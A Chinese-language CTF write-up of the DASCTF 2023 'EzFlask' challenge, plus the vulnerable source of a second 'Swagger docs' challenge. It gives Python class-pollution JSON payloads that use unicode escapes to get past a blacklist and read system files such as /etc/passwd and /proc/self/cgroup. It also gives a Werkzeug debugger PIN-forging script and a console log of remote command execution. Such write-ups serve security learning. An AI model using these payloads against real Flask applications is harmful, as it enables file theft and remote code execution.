DASCTF & 0X401:EzFlask

DASCTF 2023 & 0X401:EzFlask

打开靶机之后直接给了源码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
import uuid

from flask import Flask, request, session
from secret import black_list
import json

app = Flask(__name__)
app.secret_key = str(uuid.uuid4())

def check(data):
for i in black_list:
if i in data:
return False
return True

def merge(src, dst):
for k, v in src.items():
if hasattr(dst, '__getitem__'):
if dst.get(k) and type(v) == dict:
merge(v, dst.get(k))
else:
dst[k] = v
elif hasattr(dst, k) and type(v) == dict:
merge(v, getattr(dst, k))
else:
setattr(dst, k, v)

class user():
def __init__(self):
self.username = ""
self.password = ""
pass
def check(self, data):
if self.username == data['username'] and self.password == data['password']:
return True
return False

Users = []

@app.route('/register',methods=['POST'])
def register():
if request.data:
try:
if not check(request.data):
return "Register Failed"
data = json.loads(request.data)
if "username" not in data or "password" not in data:
return "Register Failed"
User = user()
merge(data, User)
Users.append(User)
except Exception:
return "Register Failed"
return "Register Success"
else:
return "Register Failed"

@app.route('/login',methods=['POST'])
def login():
if request.data:
try:
data = json.loads(request.data)
if "username" not in data or "password" not in data:
return "Login Failed"
for user in Users:
if user.check(data):
session["username"] = data["username"]
return "Login Success"
except Exception:
return "Login Failed"
return "Login Failed"

@app.route('/',methods=['GET'])
def index():
return open(__file__, "r").read()

if __name__ == "__main__":
app.run(host="0.0.0.0", port=5010)


payload = {
"username" : "admin",
"password" : "admin",
"__init__" : {
"__globals__" : {
"__file__" : "etc/passwd"
}
}
}

代码审计

黑名单

此时在代码中定义了check()函数

1
2
3
4
5
def check(data):
for i in black_list:
if i in data:
return False
return True

此时会对其做一个过滤;若是在黑名单中变会return Flase;这也间接的告诉我们存在过滤点

合并函数merge

1
2
3
4
5
6
7
8
9
10
11
def merge(src, dst):
for k, v in src.items():
if hasattr(dst, '__getitem__'):
if dst.get(k) and type(v) == dict:
merge(v, dst.get(k))
else:
dst[k] = v
elif hasattr(dst, k) and type(v) == dict:
merge(v, getattr(dst, k))
else:
setattr(dst, k, v)

此时出现了合并函数,我们就可以把思路往Ptyhon原型链污染上面靠

注册路由

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
def register():
if request.data:
try:
if not check(request.data):
return "Register Failed"
data = json.loads(request.data)
if "username" not in data or "password" not in data:
return "Register Failed"
User = user()
merge(data, User)
Users.append(User)
except Exception:
return "Register Failed"
return "Register Success"
else:
return "Register Failed"

此时出现了一个注册路由;并且在该路由中使用了合并函数

登录路由

1
2
3
4
5
6
7
8
9
10
11
12
13
def login():
if request.data:
try:
data = json.loads(request.data)
if "username" not in data or "password" not in data:
return "Login Failed"
for user in Users:
if user.check(data):
session["username"] = data["username"]
return "Login Success"
except Exception:
return "Login Failed"
return "Login Failed"

根路由

1
2
def index():
return open(__file__, "r").read()

此时根路由会返回__file__的文件内容;这也是为什么我们一进去就直接将源码返回给我们的原因

非预期解一:污染为环境变量

此时我们将源码审计完之后思路大致也出来了;既然在根路由return open(__file__, "r").read()会直接返回__file__的内容;那么此时我们直接将__file__污染掉我们想读取的值即可

payload

1
2
3
4
5
6
7
8
9
{
"username" : "admin",
"password" : "admin",
"__init__" : {
"__globals__" : {
"__file__" : "/proc/1/environ"
}
}
}

但是此时发现Register Failed那么问题应该是出在关键词被过滤的情况

json识别unicode绕过过滤

此时我们再次回到源码发现在注册路由data = json.loads(request.data);此时会将数据json化;我们又知道json识别unicode;所以我们将__init__进行unicode编码进行绕过

1
2
3
4
5
6
7
8
9
{
"username" : "admin",
"password" : "admin",
"__init\u005f_" : {
"__globals__" : {
"__file__" : "/proc/1/environ"
}
}
}

此时再次刷新触发根路由即可发现污染成功。

非预期解二:static静态目录污染

参考文章:https://boogipop.com/2023/07/22/DASCTF%202023%20&%200X401%20Web%20WriteUp/#EzFlask

_static_url_path

这个属性中存放的是flask中静态目录的值,默认该值为static。访问flask下的资源可以采用如http://domain/static/xxx,这样实际上就相当于访问_static_url_path目录下xxx的文件并将该文件内容作为响应内容返回

payload

1
2
3
4
5
6
7
8
9
10
11
{
"username":1,
"password":1,
"__init\u005f_":{
"__globals__":{
"app":{
"_static_folder":"/"
}
}
}
}
app 全局变量

app是 Flask 应用的实例,是一个 Flask 对象。通过创建 app 对象,我们可以定义路由、处理请求、设置配置等,从而构建一个完整的 Web 应用程序。
Flask 应用实例是整个应用的核心,负责处理用户的请求并返回相应的响应。可以通过 app.route 装饰器定义路由,将不同的 URL 请求映射到对应的处理函数上。
app 对象包含了大量的功能和方法,例如 route、run、add_url_rule 等,这些方法用于处理请求和设置应用的各种配置。
通过 app.run() 方法,我们可以在指定的主机和端口上启动 Flask 应用,使其监听并处理客户端的请求。

static_folder 全局变量

static_folder 是 Flask 应用中用于指定静态文件的文件夹路径。静态文件通常包括 CSS、JavaScript、图像等,用于展示网页的样式和交互效果。
静态文件可以包含在 Flask 应用中,例如 CSS 文件用于设置网页样式,JavaScript 文件用于实现网页的交互功能,图像文件用于显示图形内容等。
在 Flask 中,可以通过 app.static_folder 属性来访问 static_folder,并指定存放静态文件的文件夹路径。默认情况下,静态文件存放在应用程序的根目录下的 static 文件夹中。
Flask 在处理请求时,会自动寻找静态文件的路径,并将静态文件发送给客户端,使网页能够正确地显示样式和图像。

预期解:PIN码的计算

此时可以通过dirsearch扫出一个console后台

此时的考点就很清楚了;我们需要拿到这个PIN码才可以接管控制台进而实现rcePIN码也就是flask在开启debug模式下,进行代码调试模式的进入密码,需要正确的PIN码才能进入调试模式

PIN码的计算

PIN码生成六要素

1
2
3
4
5
6
username:可以在任意文件读取下读取 /etc/password 进行猜测
modname:默认是 flask.app
appname:默认是 Flask
moddir:flask库下app.py的绝对路径,可以通过报错拿到,如传参的时候给个不存在的变量
uuidnode:mac地址的十进制:任意文件读取/sys/class/net/the0/address
machine_id:机器码,有两个值拼接而成。

PIN码计算脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
import hashlib
from itertools import chain
probably_public_bits = [
'root', # username
'flask.app', # modname
'Flask', # appname
'/usr/local/lib/python3.10/site-packages/flask/app.py' # moddir
]

private_bits = [
'121451721339492', # uuidnode
'96cec10d3d9307792745ec3b85c89620docker-20d650c86c61450efe2a7758e70c0ca3deb6f737281eceee65c9f40abaed161d.scope' #/etc/machine-id + /proc/self/cgroup
]

h = hashlib.sha1()
for bit in chain(probably_public_bits, private_bits):
if not bit:
continue
if isinstance(bit, str):
bit = bit.encode("utf-8")
h.update(bit)
h.update(b"cookiesalt")

cookie_name = f"__wzd{h.hexdigest()[:20]}"

# If we need to generate a pin we salt it a bit more so that we don't
# end up with the same value and generate out 9 digits
num = None
if num is None:
h.update(b"pinsalt")
num = f"{int(h.hexdigest(), 16):09d}"[:9]

# Format the pincode in groups of digits for easier remembering if
# we don't have a result yet.
rv = None
if rv is None:
for group_size in 5, 4, 3:
if len(num) % group_size == 0:
rv = "-".join(
num[x : x + group_size].rjust(group_size, "0")
for x in range(0, len(num), group_size)
)
break
else:
rv = num

print(rv)

读取username

payload

1
2
3
4
5
6
7
8
9
{
"username" : "admin",
"password" : "admin",
"__init\u005f_" : {
"__globals__" : {
"__file__" : "/etc/passwd"
}
}
}

username = root

读取moddir

moddir是flask库下app.py的绝对路径,可以通过报错拿到,如传参的时候给个不存在的变量

payload

1
2
3
4
5
6
7
8
9
{
"username" : "admin",
"password" : "admin",
"__init\u005f_" : {
"__globals__" : {
"__file__" : "/hhhhhhhhhhhhhhhh"
}
}
}

moddir = /usr/local/lib/python3.10/site-packages/flask/app.py

读取uuidnode

uuidnode:mac地址的十进制:任意文件读取/sys/class/net/the0/address

payload

1
2
3
4
5
6
7
8
9
{
"username" : "admin",
"password" : "admin",
"__init\u005f_" : {
"__globals__" : {
"__file__" : "/sys/class/net/eth0/address"
}
}
}

uuidnode = 121451721339492

读取machine_id

machine_id

机器码,有两个值拼接而成。分别是在/etc/machine-id/proc/self/cgroup其中以docker为分界

paylaod

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
{
"username" : "admin",
"password" : "admin",
"__init\u005f_" : {
"__globals__" : {
"__file__" : "/etc/machine-id"
}
}
}

{
"username" : "admin",
"password" : "admin",
"__init\u005f_" : {
"__globals__" : {
"__file__" : "/proc/sys/kernel/random/boot_id"
}
}
}

{
"username" : "admin",
"password" : "admin",
"__init\u005f_" : {
"__globals__" : {
"__file__" : "/proc/self/cgroup"
}
}
}

machine_id = 96cec10d3d9307792745ec3b85c89620docker-20d650c86c61450efe2a7758e70c0ca3deb6f737281eceee65c9f40abaed161d.scope

利用脚本计算出PIN码

rce

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
[console ready]
>>> import os
>>> os.popen('ls /').read()
'app\nbin\nboot\ndev\netc\nflag123123_is312312312_here3123213\nhome'
>>> os.popen('cat nflag123123_is312312312_here3123213').read()
''
>>> os.popen('cat flag*').read()
''
>>> os.popen('ls -a').read()
'.\n..\n__pycache__\napp.py\nsecret.py\n'
>>> os.popen('cat /flag').read()
''
>>> os.popen('tac /flag').read()
''
>>> os.popen('tac /flag123123_is312312312_here3123213').read()
'DASCTF{84c5420a-7806-4a71-b3c6-8124add06bd0}\n'

I-SOON x D0g3:Swagger docs

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
#coding=gbk
import json
from flask import Flask, request, jsonify,send_file,render_template_string
import jwt
import requests
from functools import wraps
from datetime import datetime
import os

app = Flask(__name__)
app.config['TEMPLATES_RELOAD']=True

app.config['SECRET_KEY'] = 'fake_flag'
current_time = datetime.now().strftime('%Y-%m-%d %H:%M:%S')
response0 = {
'code': 0,
'message': 'failed',
'result': None
}
response1={
'code': 1,
'message': 'success',
'result': current_time
}

response2 = {
'code': 2,
'message': 'Invalid request parameters',
'result': None
}


def auth(func):
@wraps(func)
def decorated(*args, **kwargs):
token = request.cookies.get('token')
if not token:
return 'Invalid token', 401
try:
payload = jwt.decode(token, app.config['SECRET_KEY'], algorithms=['HS256'])
if payload['username'] == User.username and payload['password'] == User.password:
return func(*args, **kwargs)
else:
return 'Invalid token', 401
except:
return 'Something error?', 500

return decorated

@app.route('/',methods=['GET'])
def index():
return send_file('api-docs.json', mimetype='application/json;charset=utf-8')

@app.route('/api-base/v0/register', methods=['GET', 'POST'])
def register():
if request.method == 'POST':
username = request.json['username']
password = request.json['password']
User.setUser(username,password)
token = jwt.encode({'username': username, 'password': password}, app.config['SECRET_KEY'], algorithm='HS256')
User.setToken(token)
return jsonify(response1)

return jsonify(response2),400


@app.route('/api-base/v0/login', methods=['GET', 'POST'])
def login():
if request.method == 'POST':
username = request.json['username']
password = request.json['password']
try:
token = User.token
payload = jwt.decode(token, app.config['SECRET_KEY'], algorithms=['HS256'])
if payload['username'] == username and payload['password'] == password:
response = jsonify(response1)
response.set_cookie('token', token)
return response
else:
return jsonify(response0), 401
except jwt.ExpiredSignatureError:
return 'Invalid token', 401
except jwt.InvalidTokenError:
return 'Invalid token', 401

return jsonify(response2), 400

@app.route('/api-base/v0/update', methods=['POST', 'GET'])
@auth
def update_password():
try:
if request.method == 'POST':
try:
new_password = request.get_json()
if new_password:

update(new_password, User)

updated_token = jwt.encode({'username': User.username, 'password': User.password},
app.config['SECRET_KEY'], algorithm='HS256')
User.token = updated_token
response = jsonify(response1)
response.set_cookie('token',updated_token)
return response
else:
return jsonify(response0), 401
except:
return "Something error?",505
else:
return jsonify(response2), 400

except jwt.ExpiredSignatureError:
return 'Invalid token', 401
except jwt.InvalidTokenError:
return 'Invalid token', 401

def update(src, dst):
if hasattr(dst, '__getitem__'):
for key in src:
if isinstance(src[key], dict):
if key in dst and isinstance(src[key], dict):
update(src[key], dst[key])
else:
dst[key] = src[key]
else:
dst[key] = src[key]
else:
for key, value in src.items() :
if hasattr(dst,key) and isinstance(value, dict):
update(value,getattr(dst, key))
else:
setattr(dst, key, value)


@app.route('/api-base/v0/logout')
def logout():
response = jsonify({'message': 'Logout successful!'})
response.delete_cookie('token')
return response


@app.route('/api-base/v0/search', methods=['POST','GET'])
@auth
def api():
if request.args.get('file'):
try:
if request.args.get('id'):
id = request.args.get('id')
else:
id = ''
data = requests.get("http://127.0.0.1:8899/v2/users?file=" + request.args.get('file') + '&id=' + id)
if data.status_code != 200:
return data.status_code

if request.args.get('type') == "text":

return render_template_string(data.text)
else:
return jsonify(json.loads(data.text))
except jwt.ExpiredSignatureError:
return 'Invalid token', 401
except jwt.InvalidTokenError:
return 'Invalid token', 401
except Exception:
return 'something error?'
else:
return jsonify(response2)

class MemUser:
def setUser(self, username, password):
self.username = username
self.password = password

def setToken(self, token):
self.token = token

def __init__(self):
self.username="admin"
self.password="password"
self.token=jwt.encode({'username': self.username, 'password': self.password}, app.config['SECRET_KEY'], algorithm='HS256')

if __name__ == '__main__':
User = MemUser()
app.run(host='0.0.0.0')